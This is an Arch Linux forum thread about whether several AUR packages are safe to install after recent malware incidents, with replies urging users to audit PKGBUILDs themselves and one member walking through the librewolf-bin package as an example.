Arch Linux

niko787

Member

Registered: 2022-03-10

Posts: 25

Is it safe to install these packages?

Considering the recent aur attacks with malware is it safe to install these packages:

https://aur.archlinux.org/packages/google-chrome
https://aur.archlinux.org/packages/librewolf-bin
https://aur.archlinux.org/packages/microsoft-edge-stable-bin
https://aur.archlinux.org/packages/ulauncher
https://aur.archlinux.org/packages/yacreader-bin

tridra

Member

Registered: 2024-11-03

Posts: 38

Re: Is it safe to install these packages?

Let's say a random person on the forum tells you they're safe to install, would you install them?

SimonJ

Member

From: Spain

Registered: 2021-05-11

Posts: 335

Website

Re: Is it safe to install these packages?

Considering the recent aur attacks with malware is it safe to install these packages:

https://aur.archlinux.org/packages/google-chrome
https://aur.archlinux.org/packages/librewolf-bin
https://aur.archlinux.org/packages/microsoft-edge-stable-bin
https://aur.archlinux.org/packages/ulauncher
https://aur.archlinux.org/packages/yacreader-bin

The whole problem with the AUR is users not doing their due diligence, you need to check. If you have checked please post the details and findings.

---

Rlu: 222126

5hridhyan

Member

Registered: 2025-12-25

Posts: 895

Website

Re: Is it safe to install these packages?

Let's say a random person on the forum tells you they're safe to install, would you install them?

No. And no one should

Edit:
Unless the person cares to explain each part of the PKGBUILD, and justify WHY it is safe upon being asked about it

Last edited by 5hridhyan (2026-06-17 12:03:10)

gromit

Administrator

From: Germany

Registered: 2024-02-10

Posts: 1,538

Website

Re: Is it safe to install these packages?

google-chrome is maintained by me, so I can say for sure that it's safe

5hridhyan

Member

Registered: 2025-12-25

Posts: 895

Website

Re: Is it safe to install these packages?

Ah yeah, gromit is the exception to my point! Though technically... even if an official PM/Developer maintains it, we should still check the PKGBUILD to make sure "the" account wasn't hijacked by a malicious actor while you slept

Edit:
I mean in most cases 'Trust, but verify' doesn't apply when the person writing the code is the one keeping the lights on around here, If I imagine "PMs/Devs" account getting compromised, it wouldn't be limited to the AUR [/terrified]

Last edited by 5hridhyan (2026-06-17 12:31:16)

SimonJ

Member

From: Spain

Registered: 2021-05-11

Posts: 335

Website

Re: Is it safe to install these packages?

google-chrome is maintained by me, so I can say for sure that it's safe

Haha, what a perfect response. :-)

---

Rlu: 222126

tridra

Member

Registered: 2024-11-03

Posts: 38

Re: Is it safe to install these packages?

Or an evil maid attack, you can't trust anyone.

niko787

Member

Registered: 2022-03-10

Posts: 25

Re: Is it safe to install these packages?

So, should i look first for flatpak and snap software and use aur packages as a last resort?

Lone_Wolf

Administrator

From: Netherlands, Europe

Registered: 2005-10-04

Posts: 15,146

Re: Is it safe to install these packages?

flatpak, snap, appimage have their own problems and security risks.

Who do you put your trust in ?

My custom local repo has almost 50 aur packages , 20 of which I maintain/co-maintain .
I trust the authors of the 30 other aur packages but still check the changes they make to the packages.

I stay away from flatpak & snap, sometimes use appimages IF they are published by the creators of the software.

---

Disliking systemd intensely, but not satisfied with alternatives so focusing on taming systemd.

clean chroot building not flexible enough ?
Try clean chroot manager by graysky

mithrial

Member

Registered: 2017-03-05

Posts: 154

Re: Is it safe to install these packages?

So, should i look first for flatpak and snap software and use aur packages as a last resort?

I'm unsure about snap but flatpak has the exact same issues as the AUR. It didn't come up because nothing (?) happened yet but in general, flatpak should be treated the same as the AUR.

niko787

Member

Registered: 2022-03-10

Posts: 25

Re: Is it safe to install these packages?

Yes, but some flatpak and snap software is released by the developers.

V1del

Forum Moderator

Registered: 2012-10-16

Posts: 25,255

Re: Is it safe to install these packages?

As are AUR packages case in point from your list, the AUR packages of yacreader (the non-bin one!) and ulauncher are released by their respective authors.

That said the simple answer to this particular set of packages, they are longstanding and have had stable maintainers for a while now they will not have been able to be targeted by the recent attack, so will most likely be safe (and are from a quick glance). But what everyone here tries to drive home is the fact that ultimately you need to check what their PKGBUILDs are doing and asses whether the operations within them are safe (and not blindly trust any of us, even if many here have a long standing and likely don't want to fuck you over, it's ultimately your decision and your pegorative, flatpak or snap cannot save you from this, both can and do have packages by third parties and their respective sandboxing features are optional unless you configure them to enforce certain constraints (or trust the authors to not fuck you over -- same as the AUR)

Don't trust me, go to the AUR links, check whether the upstream sources are what they claim to be, verify who is packaging them decide whether you trust that upstream and then install the package.

Last edited by V1del (2026-06-17 15:38:08)

seth

Member

From: Won't reply 2 private help req

Registered: 2012-09-03

Posts: 76,350

Re: Is it safe to install these packages?

Safe how?

https://aur.archlinux.org/packages/google-chrome
https://aur.archlinux.org/packages/microsoft-edge-stable-bin

google-chrome is maintained by me, so I can say for sure that it's safe

idk, you look kinda shady to me

@niko787
The gist here is that you cannot just shift the trust problem from one anonymous source to another.

I'll walk you a bit through https://aur.archlinux.org/cgit/aur.git/ … rewolf-bin
* The first 15 lines are (as of today!) clerical - do you see anything remotely suspicious there?
* Then there're the dependency arrays, all from the repos and nothing obscure like npm or python-pip that would act as sideloading packagemanager. Anything that worries you?
* Line #59 has a pgp key that you can research.

gpg --search-keys 662E3CDD6FE329002D0CA5BB40339DD82B12EF16

* Line #63 is

install='librewolf-bin.install'

which is a bit of a uh-oh, so we better check that file! https://aur.archlinux.org/cgit/aur.git/ … rewolf-bin
* Pfeewww - it only prints some reminder to stdout.
* Next are the sources, does https://codeberg.org/librewolf/ look legit? How can you figure that?
* Finally the package() function.
- Does anything there look concerning? Does it get other files from the internet? What is that weird "install -Dvm644 /dev/stdin "$distini" <<END" ???
- Then it seems to copy some icons.
- Another of these weird <<END things, gee - I should really figure what this pattern does. Maybe google or an AI or somebody on some forum knows that.
- Then it symlinks some binaries. Is this shady? Luckily it's also documented w/ a link to a bugtracker.

So: did anything there pose a major red flag?
Or even a minor one?
Do you have open questions about what anything in that PKGBUILD does?

---

How to upload text · How to boot w/o GUI · Disable Windows Fast-Start! · Fix your xinitrc

killertofus

Member

Registered: 2025-02-10

Posts: 192

Re: Is it safe to install these packages?

So, should i look first for flatpak and snap software and use aur packages as a last resort?

I'm unsure about snap but flatpak has the exact same issues as the AUR. It didn't come up because nothing (?) happened yet but in general, flatpak should be treated the same as the AUR.

https://blog.popey.com/2026/01/malware- … l-domains/

https://www.linuxuprising.com/2018/05/m … store.html

---

I Have Linux Perl Can i Download Gnome???

lawmurray

Member

From: Bangkok

Registered: 2025-02-10

Posts: 7

Website

Re: Is it safe to install these packages?

I wanted to add something so obvious that no one has mentioned it yet: for users not ready (or not willing) to check PKGBUILDs for the AUR, they might consider just looking at alternatives in the official repos instead. There's a lot there, and some users just may not realise there are other apps out there that could work for them.

For example, some of the packages mentioned by the OP:

* google-chrome -> chromium is in the official repos (for new users who may be unaware, that's the open source part of Chrome, without the Google stuff).
* librewolf-bin -> firefox is in the official repos (LibreWolf derives from Firefox).
* yacreader-bin -> a comic book reader I believe... foliate is in the official repos and at least one site says it reads comic books (not my thing, just doing a quick check), there may be others.

I don't mean to question why people prefer one app over another, absolutely make your choices, and I understand why you might want Chrome over Chromium or LibreWolf over Firefox. Just that if you're taking a risk in doing so (by not reading PKGBUILDs), you could consider compromising on functionality instead of security. You might even stumble upon on a new favourite app for your needs.